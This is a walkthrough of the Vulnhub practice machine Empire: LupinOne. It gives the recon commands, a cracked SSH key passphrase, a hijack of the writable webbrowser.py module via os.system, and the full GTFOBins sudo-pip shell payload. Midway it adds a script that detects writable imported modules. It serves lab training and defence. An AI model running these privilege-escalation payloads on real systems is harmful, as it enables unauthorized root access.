Vulnhub target machine Empire: LupinOne penetration test detailed explanation
Vulnhub target machine introduction:
Vulnhub is a comprehensive practice range that provides many vulnerable platforms. The virtual machines can be downloaded and run locally, and completing penetration tests, privilege escalation, vulnerability exploitation and code audits on them is like playing a game.
This is a vulnerable target machine; as usual, the goal is to find the flag.
Difficulty: Medium
Vulnhub target machine download:
Official website download: https://download.vulnhub.com/empire/01-Empire-Lupin-One.zip
Vulnhub target machine installation:
After downloading, unzip the installation package and open it with VMware.
Detailed Explanation of Vulnhub Target Machine Vulnerabilities:
①: Information collection:
On Kali, use arp-scan -l or netdiscover to discover hosts.
PS: In fact, the IP is shown on the console when the machine boots; if it is not shown, you need to scan for it.
Attacking machine (Kali) IP: 172.16.5.140; target machine IP: 172.16.5.179
Use the command:
nmap -sS -sV -T4 -n -p- 172.16.5.179
Use the command:
nmap -p22,80 -sC -sV 172.16.5.179
# You can also try the default script scan (-sC)
Visit port 80. There is only a picture, so scan port 80 as usual with dirb, dirsearch, whatweb, gobuster and so on until the robots.txt file is found. It contains nothing useful, so perform a deeper scan and use wfuzz to fuzz for user directories:
wfuzz -z file,/usr/share/wordlists/wfuzz/general/big.txt --hc 404,403 http://172.16.5.179/~FUZZ
This yields an account name: icex64. The private key needed to log in is hidden somewhere, so continue scanning, which finds the file /~secret/.mysecret.txt. Its contents are Base58 encoded.
Online Base58 decoding: http://www.hiencode.com/base58w.html
②: SSH private key brute-force login:
Here the account name is known but the key's passphrase is not, so use ssh2john to crack it. With the fasttrack dictionary the passphrase is recovered: P@55w0rd!
Then set the key's permissions to 600 (chmod 600 key), otherwise SSH will refuse to use it. Try to log in, and the login succeeds!
③: pip privilege escalation:
sudo -l
Display the commands that the current user can run with sudo: /home/arsene/heist.py may be run as the user arsene with python3.9.
Find webbrowser.py, which is writable, open it with the vi editor and add the line os.system("/bin/bash"), then save and exit.
sudo -u arsene /usr/bin/python3.9 /home/arsene/heist.py
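As an added defender's check (my own example, not code from the original post), the following script statically lists the imports of a sudo-permitted Python script and flags any whose module file or directory is writable by non-owners, which is the webbrowser.py weakness used above. The fixture in build_demo is constructed and assumed, not the target's real files; on a real host pass sys.path as search_path.

```python
import ast
import importlib.machinery
import os
import stat
import tempfile

def imported_modules(script_path):
    """Top-level module names the script imports, found by parsing it, not running it."""
    with open(script_path, encoding="utf-8") as fh:
        tree = ast.parse(fh.read(), filename=script_path)
    names = set()
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            names.update(alias.name.split(".")[0] for alias in node.names)
        elif isinstance(node, ast.ImportFrom) and node.module and node.level == 0:
            names.add(node.module.split(".")[0])
    return names

def writable_by_others(path):
    """True when the group or world write bit is set, i.e. non-owners can edit it."""
    return bool(os.stat(path).st_mode & (stat.S_IWGRP | stat.S_IWOTH))

def find_writable_imports(script_path, search_path):
    """{module: file} for imports resolved via search_path (pass sys.path on a real host)
    whose source file or directory is writable by others: the heist.py/webbrowser.py case."""
    findings = {}
    script_dir = os.path.dirname(os.path.abspath(script_path))
    for name in sorted(imported_modules(script_path)):
        spec = importlib.machinery.PathFinder.find_spec(name, [script_dir] + list(search_path))
        if spec is None or not spec.origin or not os.path.isfile(spec.origin):
            continue  # not found on the given path, or built-in: no file to tamper with
        if writable_by_others(spec.origin) or writable_by_others(os.path.dirname(spec.origin)):
            findings[name] = spec.origin
    return findings

def build_demo():
    """Constructed fixture (an assumption, not the real target): a sudo-runnable script
    importing a module that everyone can write, as with heist.py and webbrowser.py."""
    root = tempfile.mkdtemp()
    lib = os.path.join(root, "lib")
    os.mkdir(lib)
    os.chmod(lib, 0o755)                    # the directory itself is fine
    mod = os.path.join(lib, "webbrowser.py")
    with open(mod, "w") as fh:
        fh.write("def open(url):\n    return url\n")
    os.chmod(mod, 0o666)                    # the misconfiguration: world-writable module
    script = os.path.join(root, "heist.py")
    with open(script, "w") as fh:
        fh.write("import webbrowser\nimport json\n")
    return script, [lib]
```

Running find_writable_imports(*build_demo()) reports only webbrowser, since json is not resolved from the constructed path and the script's own directory is not writable by others.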
Now that you have arsene's permissions, run sudo -l again to check which commands this user can run with sudo, and find that pip can be run with elevated privileges (the first time you see this you won't know how to use it; just learn it).
Look it up directly on GTFOBins: https://gtfobins.github.io/gtfobins/pip/
TF=$(mktemp -d)
echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
sudo pip install $TF
At this point the flag has been obtained and the penetration test in this article is over. Thank you for reading!
Vulnhub target machine penetration summary:
The difficulty of this target machine is moderate.
1. Information collection: arp-scan -l to obtain the IP address, port information, and web scanning with tools such as nikto, dirb, dirbuster, whatweb; also check the page source with F12.
2. Base58 encoding; the SSH key passphrase must be brute-forced with ssh2john.
3. SSH private key login: the key must be given permissions 600, otherwise an error is reported.
4. pip privilege escalation (first use).
Both Empire articles are now finished! Creating these is not easy; I hope they help everyone. If you like this, please give it a like, favourite and share. Your happiness is my greatest happiness!